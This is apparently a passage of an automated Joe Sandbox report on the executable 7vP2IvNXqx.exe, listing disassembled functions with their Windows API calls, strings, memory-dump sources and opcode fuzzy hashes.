                                        Function 002EB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadBitmapW.USER32(00000065), ref: 002EB6ED
                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 002EB712
                                        • DeleteObject.GDI32(00000000), ref: 002EB744
                                        • DeleteObject.GDI32(00000000), ref: 002EB767
                                          • Part of subcall function 002EA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,002EB73D,00000066), ref: 002EA6D5
                                          • Part of subcall function 002EA6C2: SizeofResource.KERNEL32(00000000,?,?,?,002EB73D,00000066), ref: 002EA6EC
                                          • Part of subcall function 002EA6C2: LoadResource.KERNEL32(00000000,?,?,?,002EB73D,00000066), ref: 002EA703
                                          • Part of subcall function 002EA6C2: LockResource.KERNEL32(00000000,?,?,?,002EB73D,00000066), ref: 002EA712
                                          • Part of subcall function 002EA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,002EB73D,00000066), ref: 002EA72D
                                          • Part of subcall function 002EA6C2: GlobalLock.KERNEL32(00000000), ref: 002EA73E
                                          • Part of subcall function 002EA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 002EA762
                                          • Part of subcall function 002EA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 002EA7A7
                                          • Part of subcall function 002EA6C2: GlobalUnlock.KERNEL32(00000000), ref: 002EA7C6
                                          • Part of subcall function 002EA6C2: GlobalFree.KERNEL32(00000000), ref: 002EA7CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                        • String ID: ]
                                        • API String ID: 1797374341-3352871620
                                        • Opcode ID: a50cbb8f52def95aec92dfc4c59a8ed170dccc69c7c3c6e1bd929f8e4c156b4b
                                        • Instruction ID: 797a2dd5e78fb58a9f2ac202a24560518111c6f525763dcbaee84dc5ca4beabc
                                        • Opcode Fuzzy Hash: a50cbb8f52def95aec92dfc4c59a8ed170dccc69c7c3c6e1bd929f8e4c156b4b
                                        • Instruction Fuzzy Hash: 7801493399014267D7137B764C89ABFBA7D9FC1752F840010F900A7291DF318D2546B1
                                        Function 002ED600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 002D1316: GetDlgItem.USER32(00000000,00003021), ref: 002D135A
                                          • Part of subcall function 002D1316: SetWindowTextW.USER32(00000000,003035F4), ref: 002D1370
                                        • EndDialog.USER32(?,00000001), ref: 002ED64B
                                        • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 002ED661
                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 002ED675
                                        • SetDlgItemTextW.USER32(?,00000068), ref: 002ED684
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ItemText$DialogWindow
                                        • String ID: RENAMEDLG
                                        • API String ID: 445417207-3299779563
                                        • Opcode ID: ef688f9771269107c7de0f3685199f86d203af767368be3cb86b97f884c67dff
                                        • Instruction ID: 1acc6df7594ce87779aa76751628742d44ada2d02757b85e89f237138357cbf0
                                        • Opcode Fuzzy Hash: ef688f9771269107c7de0f3685199f86d203af767368be3cb86b97f884c67dff
                                        • Instruction Fuzzy Hash: 0D0168332E4350BED2224F25AE09F5B776CFB5AB01F000010F301A20D0C6B2A9258B35
                                        Function 002F7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,002F7E24,00000000,?,002F7DC4,00000000,0030C300,0000000C,002F7F1B,00000000,00000002), ref: 002F7E93
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002F7EA6
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,002F7E24,00000000,?,002F7DC4,00000000,0030C300,0000000C,002F7F1B,00000000,00000002), ref: 002F7EC9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: 1427ed1c9e0d92fef4ec56acbcffb0fa5b69cc6880011c935792fd1636624b62
                                        • Instruction ID: 82eba181b6dfe5d7450b8351f3d49a8450af6a977ab40c65f3d362b111dd86bd
                                        • Opcode Fuzzy Hash: 1427ed1c9e0d92fef4ec56acbcffb0fa5b69cc6880011c935792fd1636624b62
                                        • Instruction Fuzzy Hash: 65F04431A12209BBDB129FA5DC19BEEFFBCEB44755F0040AAF805A2150DB319E50CA90
                                        Function 002DF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 002E081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002E0836
                                          • Part of subcall function 002E081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,002DF2D8,Crypt32.dll,00000000,002DF35C,?,?,002DF33E,?,?,?), ref: 002E0858
                                        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 002DF2E4
                                        • GetProcAddress.KERNEL32(003181C8,CryptUnprotectMemory), ref: 002DF2F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AddressProc$DirectoryLibraryLoadSystem
                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                        • API String ID: 2141747552-1753850145
                                        • Opcode ID: fdd90df05214e72cad28494bb900d6847fa850200560e46a56bda490c256f174
                                        • Instruction ID: a8e37658f69545b5606ac573b6f1374e5f11a1979c1e499a8d251a87f4265d10
                                        • Opcode Fuzzy Hash: fdd90df05214e72cad28494bb900d6847fa850200560e46a56bda490c256f174
                                        • Instruction Fuzzy Hash: 43E08670A62742AEC7629F35995DB427BDC6F04700F14885FF0DB93680D7B4D9908B50
                                        Function 002F2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AdjustPointer$_abort
                                        • String ID:
                                        • API String ID: 2252061734-0
                                        • Opcode ID: b32a451c402c2f33c6c52c2cd3b4a20ab9b71f71a3975cda82430897dc1b61b6
                                        • Instruction ID: f3d1c56b35f0c71c7c739a8e719259760b1659d3a3ec1690b0cc06246bfd76d5
                                        • Opcode Fuzzy Hash: b32a451c402c2f33c6c52c2cd3b4a20ab9b71f71a3975cda82430897dc1b61b6
                                        • Instruction Fuzzy Hash: AD51F17152121AEFEB298F14C985BBAF3A4FF15780F24413AEE01476A1D731EC68DB90
                                        Function 002FBF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 002FBF39
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002FBF5C
                                          • Part of subcall function 002F8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,002FCA2C,00000000,?,002F6CBE,?,00000008,?,002F91E0,?,?,?), ref: 002F8E38
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 002FBF82
                                        • _free.LIBCMT ref: 002FBF95
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002FBFA4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                        • String ID:
                                        • API String ID: 336800556-0
                                        • Opcode ID: 542be04806312d536b94fc270bdff5455d33ceb6551fc0af024700687172f34e
                                        • Instruction ID: 51b48d345e92a248e8d06440b2bad7f16315f59a82b3c763532c9f7bb57461e7
                                        • Opcode Fuzzy Hash: 542be04806312d536b94fc270bdff5455d33ceb6551fc0af024700687172f34e
                                        • Instruction Fuzzy Hash: 8D01DD726216197F63232A769C5CC7BEA6DDECABD03140239FB04C2100DF608D1185B0
                                        Function 002F9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,002F91AD,002FB188,?,002F9813,00000001,00000364,?,002F3F73,00000050,?,00311030,00000200), ref: 002F986E
                                        • _free.LIBCMT ref: 002F98A3
                                        • _free.LIBCMT ref: 002F98CA
                                        • SetLastError.KERNEL32(00000000,?,00311030,00000200), ref: 002F98D7
                                        • SetLastError.KERNEL32(00000000,?,00311030,00000200), ref: 002F98E0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID:
                                        • API String ID: 3170660625-0
                                        • Opcode ID: 643344bc74090fbd1d1bd5faacb06b0d0f32bb32d14743212d47bbae30066925
                                        • Instruction ID: 3f7ce8f39baabea8d9739b87b93c3a5bfc0416977777a13aa75266e7a204b3c1
                                        • Opcode Fuzzy Hash: 643344bc74090fbd1d1bd5faacb06b0d0f32bb32d14743212d47bbae30066925
                                        • Instruction Fuzzy Hash: A201213223260E6BC3132B39AC95B7BE52D9FC37E0F200036FB1692292EE608C614520
                                        Function 002E0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 002E11CF: ResetEvent.KERNEL32(?), ref: 002E11E1
                                          • Part of subcall function 002E11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 002E11F5
                                        • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 002E0F21
                                        • CloseHandle.KERNEL32(?,?), ref: 002E0F3B
                                        • DeleteCriticalSection.KERNEL32(?), ref: 002E0F54
                                        • CloseHandle.KERNEL32(?), ref: 002E0F60
                                        • CloseHandle.KERNEL32(?), ref: 002E0F6C
                                          • Part of subcall function 002E0FE4: WaitForSingleObject.KERNEL32(?,000000FF,002E1206,?), ref: 002E0FEA
                                          • Part of subcall function 002E0FE4: GetLastError.KERNEL32(?), ref: 002E0FF6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                        • String ID:
                                        • API String ID: 1868215902-0
                                        • Opcode ID: dc8de33c1eaa7fef7df1feeaf375fbd6b226fade58d8aef1ad802b5b337fee00
                                        • Instruction ID: 4ca3a1feac6007ccb9f9e5330f6adc40fd5413ac143ccff2a67c1ab65e866707
                                        • Opcode Fuzzy Hash: dc8de33c1eaa7fef7df1feeaf375fbd6b226fade58d8aef1ad802b5b337fee00
                                        • Instruction Fuzzy Hash: DD01B571042744EFC7229F65DC84BC6FBADFB08710F40492AF15B52560CBB57A65CB50
                                        Function 002FC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 002FC817
                                          • Part of subcall function 002F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,002FC896,?,00000000,?,00000000,?,002FC8BD,?,00000007,?,?,002FCCBA,?), ref: 002F8DE2
                                          • Part of subcall function 002F8DCC: GetLastError.KERNEL32(?,?,002FC896,?,00000000,?,00000000,?,002FC8BD,?,00000007,?,?,002FCCBA,?,?), ref: 002F8DF4
                                        • _free.LIBCMT ref: 002FC829
                                        • _free.LIBCMT ref: 002FC83B
                                        • _free.LIBCMT ref: 002FC84D
                                        • _free.LIBCMT ref: 002FC85F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: acb03c8c924482404c47cec3f5be44b649a66ca12a2edea2088448ffce4c6823
                                        • Instruction ID: 7cbb533b3551e01222d1be68962e4ea09978fd0faeff543db313a0eb22714940
                                        • Opcode Fuzzy Hash: acb03c8c924482404c47cec3f5be44b649a66ca12a2edea2088448ffce4c6823
                                        • Instruction Fuzzy Hash: 27F0E13262510DABC716EF64E585C26F7EDAE017D4B681C2AF305D7551CA70FC50CA54
                                        Function 002E1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 002E1FE5
                                        • _wcslen.LIBCMT ref: 002E1FF6
                                        • _wcslen.LIBCMT ref: 002E2006
                                        • _wcslen.LIBCMT ref: 002E2014
                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,002DB371,?,?,00000000,?,?,?), ref: 002E202F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcslen$CompareString
                                        • String ID:
                                        • API String ID: 3397213944-0
                                        • Opcode ID: 3e546f75845cb59cb83abc22608924b32f326605a943618520ae2bebaf52569d
                                        • Instruction ID: 368d5435522d979dc2b2ffd7cc37f507321349e650b6defd457e420f4097cd1e
                                        • Opcode Fuzzy Hash: 3e546f75845cb59cb83abc22608924b32f326605a943618520ae2bebaf52569d
                                        • Instruction Fuzzy Hash: 00F0CD32028018BFDF266F51EC08E8A7F2AEF507A0B108415F61A5A0A1CB729675DA90
                                        Function 002E15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _swprintf
                                        • String ID: %ls$%s: %s
                                        • API String ID: 589789837-2259941744
                                        • Opcode ID: ed7e953db0aaff80c6cc71f6ca3e7d8138ed1d3f1e93616a6caf655451e24a3e
                                        • Instruction ID: e448f3fc475c5d3b39c10bcb4f6ed660a9b9e5dfad8c6a3415aa0b160f2e11bf
                                        • Opcode Fuzzy Hash: ed7e953db0aaff80c6cc71f6ca3e7d8138ed1d3f1e93616a6caf655451e24a3e
                                        • Instruction Fuzzy Hash: D05111752F83C0F6F6222E928D46F35B25D6B15F04F944537F386684D1C6F29830AB1A
                                        Function 002F7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\7vP2IvNXqx.exe,00000104), ref: 002F7FAE
                                        • _free.LIBCMT ref: 002F8079
                                        • _free.LIBCMT ref: 002F8083
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _free$FileModuleName
                                        • String ID: C:\Users\user\Desktop\7vP2IvNXqx.exe
                                        • API String ID: 2506810119-2513647909
                                        • Opcode ID: fbe0764b7d5d9a752b40d916eea19e0dc1157ae713aef1627217f855072882b4
                                        • Instruction ID: bf567e54da8c26d02206ebbc89315aa4589d13993d82488d4ca0d3a992543234
                                        • Opcode Fuzzy Hash: fbe0764b7d5d9a752b40d916eea19e0dc1157ae713aef1627217f855072882b4
                                        • Instruction Fuzzy Hash: AB31A071A1021DAFDB22DF95DC81DAEFBBCEF95390F50417AE60497210DAB08A548B61
                                        Function 002F31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 002F31FB
                                        • _abort.LIBCMT ref: 002F3306
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: EncodePointer_abort
                                        • String ID: MOC$RCC
                                        • API String ID: 948111806-2084237596
                                        • Opcode ID: 00aa62d442ce48ba3ca47d6976670175812c95b534944a86de7aa937b579c6a6
                                        • Instruction ID: 31224e2677099e4ff997898c1cf8cf46740e7316eaf285859cfa133bbc18bb07
                                        • Opcode Fuzzy Hash: 00aa62d442ce48ba3ca47d6976670175812c95b534944a86de7aa937b579c6a6
                                        • Instruction Fuzzy Hash: 8A414B7191010EAFCF15DF98CD81AEEBBB5BF48344F1480A9FA0467212D3359E60DB50
                                        Function 002D7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002D7406
                                          • Part of subcall function 002D3BBA: __EH_prolog.LIBCMT ref: 002D3BBF
                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 002D74CD
                                          • Part of subcall function 002D7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 002D7AAB
                                          • Part of subcall function 002D7A9C: GetLastError.KERNEL32 ref: 002D7AF1
                                          • Part of subcall function 002D7A9C: CloseHandle.KERNEL32(?), ref: 002D7B00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                        • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                        • API String ID: 3813983858-639343689
                                        • Opcode ID: 7a2fbc1b13a9b27fe809db5fe987f60766aee66cab25564e648d864ff37f2182
                                        • Instruction ID: 86349a4cc1173a8947434f7dafed78a7cc49b4eb6187c18e4e6b695ff93ab1f1
